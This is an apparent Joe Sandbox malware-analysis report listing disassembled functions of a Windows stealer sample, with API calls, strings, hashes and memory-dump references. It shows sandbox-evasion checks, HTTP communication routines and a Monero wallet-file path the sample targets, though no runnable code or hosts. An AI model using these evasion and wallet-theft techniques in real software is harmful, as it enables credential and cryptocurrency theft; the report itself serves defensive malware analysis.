Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 1834069da3ff1d7cbea07daab88b41292e548bd8560375bc925c0a4352eb61ab
Instruction ID: bcf9aef14759658e2f96425d03a066f6d0499705b31ebe553accf1dbbe0935f5
Opcode Fuzzy Hash: 1834069da3ff1d7cbea07daab88b41292e548bd8560375bc925c0a4352eb61ab
Instruction Fuzzy Hash: DB62FCB66182009FC344DFA9ED88D567BB9F74D701718862BFA1AC3270EB35A951CF60

Function 005F48D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005F4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4889
Part of subcall function 005F4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4899

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005F4965
StrCmpCA.SHLWAPI(?,00F4FD10), ref: 005F498A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F4B0A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00610DDE,00000000,?,?,00000000,?,",00000000,?,00F4FC70), ref: 005F4E38
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005F4E54
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005F4E68
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 005F4E99
InternetCloseHandle.WININET(00000000), ref: 005F4EFD
InternetCloseHandle.WININET(00000000), ref: 005F4F15
HttpOpenRequestA.WININET(00000000,00F4FC10,?,00F4F4E8,00000000,00000000,00400100,00000000), ref: 005F4B65

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 0060AC30: lstrcpy.KERNEL32(00000000,?), ref: 0060AC82
Part of subcall function 0060AC30: lstrcat.KERNEL32(00000000), ref: 0060AC92

InternetCloseHandle.WININET(00000000), ref: 005F4F1F

Strings

------, xrefs: 005F4A0D
------, xrefs: 005F4CB9
", xrefs: 005F4C42
------, xrefs: 005F4B78
", xrefs: 005F4D83

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: cd58488e6a426984dab164a75f40ad6b9fd39cc8c75c64bb649666c035e9a034
Instruction ID: 4bf7f303c018d9139d013f2c3c8758a1af258491f2727d1b5b513c552197d8b0
Opcode Fuzzy Hash: cd58488e6a426984dab164a75f40ad6b9fd39cc8c75c64bb649666c035e9a034
Instruction Fuzzy Hash: A012DA729502189ADB58EBD0DDA2FEFB77AAF14340F50459DF106620D1EF702A88CF69

Function 00605760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0060AB30: lstrlen.KERNEL32(005F4F55,?,?,005F4F55,00610DDF), ref: 0060AB3B
Part of subcall function 0060AB30: lstrcpy.KERNEL32(00610DDF,00000000), ref: 0060AB95

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605894
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006058F1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605AA7

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 00605440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605478

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

Part of subcall function 00605510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605568
Part of subcall function 00605510: lstrlen.KERNEL32(00000000), ref: 0060557F
Part of subcall function 00605510: StrStrA.SHLWAPI(00000000,00000000), ref: 006055B4
Part of subcall function 00605510: lstrlen.KERNEL32(00000000), ref: 006055D3
Part of subcall function 00605510: lstrlen.KERNEL32(00000000), ref: 006055FE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 006059DB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00605B90
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605C5C
Sleep.KERNEL32(0000EA60), ref: 00605C6B

Strings

ERROR, xrefs: 00605C4E
ERROR, xrefs: 006059CD
ERROR, xrefs: 00605B82
ERROR, xrefs: 006058E3
ERROR, xrefs: 00605886
ERROR, xrefs: 00605A99

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 6519cc89cdda7453f3a64e6efa1aa915b35ad23c39ccd479fa0a18dfecc6d4ff
Instruction ID: d510a49880e5bf445d167226450b19e2eb173d095779b53d203d7fc30202557b
Opcode Fuzzy Hash: 6519cc89cdda7453f3a64e6efa1aa915b35ad23c39ccd479fa0a18dfecc6d4ff
Instruction Fuzzy Hash: 93E13072A502089ACB5CFBE0DDA6DFF733AAF54340F40856CA507560D1EF356A48CB6A

Function 006019F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 00601A15
ExitProcess.KERNEL32 ref: 00601A21

Strings

block, xrefs: 00601A07

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 16c4315d105b169afa7c56635e63aceaca1bc9d66b0e04b5c4ec8029a0299d51
Instruction ID: f58c67e351d88b8b725b4c59b96e559d4dbae7429daaaf383c575aa9a27c4e7a
Opcode Fuzzy Hash: 16c4315d105b169afa7c56635e63aceaca1bc9d66b0e04b5c4ec8029a0299d51
Instruction Fuzzy Hash: F3511B74B44209ABDB08DFE4D955EEF77BAAF45744F10808CE412AB290E774EA81CB61

Function 00606C90 Relevance: 9.1, APIs: 6, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F415A8), ref: 00609BF1
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F41728), ref: 00609C0A
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F415D8), ref: 00609C22
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F41518), ref: 00609C3A
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F416F8), ref: 00609C53
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F48AF8), ref: 00609C6B
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F35488), ref: 00609C83
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F35688), ref: 00609C9C
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F41608), ref: 00609CB4
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F41620), ref: 00609CCC
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F41710), ref: 00609CE5
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F41638), ref: 00609CFD
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F355A8), ref: 00609D15
Part of subcall function 00609BB0: GetProcAddress.KERNEL32(76210000,00F41740), ref: 00609D2E

Part of subcall function 0060AA50: lstrcpy.KERNEL32(00610E1A,00000000), ref: 0060AA98

Part of subcall function 005F11D0: ExitProcess.KERNEL32 ref: 005F1211

Part of subcall function 005F1160: GetSystemInfo.KERNEL32(?), ref: 005F116A
Part of subcall function 005F1160: ExitProcess.KERNEL32 ref: 005F117E

Part of subcall function 005F1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005F112B
Part of subcall function 005F1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 005F1132
Part of subcall function 005F1110: ExitProcess.KERNEL32 ref: 005F1143

Part of subcall function 005F1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005F123E
Part of subcall function 005F1220: __aulldiv.LIBCMT ref: 005F1258
Part of subcall function 005F1220: __aulldiv.LIBCMT ref: 005F1266
Part of subcall function 005F1220: ExitProcess.KERNEL32 ref: 005F1294

Part of subcall function 00606A10: GetUserDefaultLangID.KERNEL32 ref: 00606A14

Part of subcall function 005F1190: ExitProcess.KERNEL32 ref: 005F11C6

Part of subcall function 006079E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005F11B7), ref: 00607A10
Part of subcall function 006079E0: RtlAllocateHeap.NTDLL(00000000), ref: 00607A17
Part of subcall function 006079E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00607A2F

Part of subcall function 00607A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607AA0
Part of subcall function 00607A70: RtlAllocateHeap.NTDLL(00000000), ref: 00607AA7
Part of subcall function 00607A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00607ABF

Part of subcall function 0060ACC0: lstrlen.KERNEL32(?,00F489C8,?,\Monero\wallet.keys,00610E1A), ref: 0060ACD5
Part of subcall function 0060ACC0: lstrcpy.KERNEL32(00000000), ref: 0060AD14
Part of subcall function 0060ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AD22

Part of subcall function 0060ABB0: lstrcpy.KERNEL32(?,00610E1A), ref: 0060AC15

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F48AB8,?,006110F4,?,00000000,?,006110F8,?,00000000,00610AF3), ref: 00606D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00606D88
CloseHandle.KERNEL32(00000000), ref: 00606D99
Sleep.KERNEL32(00001770), ref: 00606DA4
CloseHandle.KERNEL32(?,00000000,?,00F48AB8,?,006110F4,?,00000000,?,006110F8,?,00000000,00610AF3), ref: 00606DBA
ExitProcess.KERNEL32 ref: 00606DC2

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: c4b232b769db095cf2265ad6b32c3a070cad01f5508a16ea2ea47a546685c61e
Instruction ID: 8f72a9f66aa509df05976e767eb0c67a0b5fc2b057e8f7a20bad7bac1e6c9ea4
Opcode Fuzzy Hash: c4b232b769db095cf2265ad6b32c3a070cad01f5508a16ea2ea47a546685c61e
Instruction Fuzzy Hash: C4310670A84209ABDB48FBE0DC56EFF767ABF44340F44091DF212661D2DF706A458A6A

Function 005F1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005F123E
__aulldiv.LIBCMT ref: 005F1258
__aulldiv.LIBCMT ref: 005F1266
ExitProcess.KERNEL32 ref: 005F1294

Strings

@, xrefs: 005F1233

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 287f23533d8597b1f382b5e2a9151c12495fc04db1b762f138fdadd1e6b94078
Instruction ID: f73d52909457dd12b05b18bae5bce6e4aa12b468b2fbca872b4bde105fee9188
Opcode Fuzzy Hash: 287f23533d8597b1f382b5e2a9151c12495fc04db1b762f138fdadd1e6b94078
Instruction Fuzzy Hash: BA0146B0980308EAEB10EFE1CC4ABAEBB79BB14705F608449E705BA2C0C7B855418B5D

Function 00606D93 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F48AB8,?,006110F4,?,00000000,?,006110F8,?,00000000,00610AF3), ref: 00606D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00606D88
CloseHandle.KERNEL32(00000000), ref: 00606D99
Sleep.KERNEL32(00001770), ref: 00606DA4
CloseHandle.KERNEL32(?,00000000,?,00F48AB8,?,006110F4,?,00000000,?,006110F8,?,00000000,00610AF3), ref: 00606DBA
ExitProcess.KERNEL32 ref: 00606DC2

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 48ae049d7774300491594b0bcb781d871db9155a3523763af6338b8dcd8ffbe9
Instruction ID: 1f77c492d02587d24980f0089faa4110a0f047818270ad607baed96e3f41189f
Opcode Fuzzy Hash: 48ae049d7774300491594b0bcb781d871db9155a3523763af6338b8dcd8ffbe9
Instruction Fuzzy Hash: D7F05830AC8209AFEB48BBA0DC0ABBF7376FF04742F14051AB512A51D0DBB05511CA69

Function 005F4800 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4889
InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4899

Strings

<, xrefs: 005F4819

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189670759.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189782115.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189798739.0000000000D19000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f0000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 79b1c899a5632e4cf35dd9339ecfde65b2eef90588a413bf0f458c4b0c323d17
Instruction ID: 975fae1b868a3ed4a74d8190d2e0e4e6d0ac200cc510b1414d3a4071a6736d25
Opcode Fuzzy Hash: 79b1c899a5632e4cf35dd9339ecfde65b2eef90588a413bf0f458c4b0c323d17
Instruction Fuzzy Hash: 352142B1D40209ABDF14DFA4E845ADE7B75FF44350F108625F515A72C0EB706605CF91

Function 00605440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0060AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0060AAF6

Part of subcall function 005F62D0: InternetOpenA.WININET(00610DFF,00000001,00000000,00000000,00000000), ref: 005F6331
Part of subcall function 005F62D0: StrCmpCA.SHLWAPI(?,00F4FD10), ref: 005F6353
Part of subcall function 005F62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005F6385
Part of subcall function 005F62D0: HttpOpenRequestA.WININET(00000000,GET,?,00F4F4E8,00000000,00000000,00400100,00000000), ref: 005F63D5
Part of subcall function 005F62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005F640F
Part of subcall function 005F62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005F6421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00605478

Strings

ERROR, xrefs: 0060546A
ERROR, xrefs: 006054C3

Memory Dump Source

Source File: 00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000000.00000002.2184157959.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2184845455.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2186375933.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
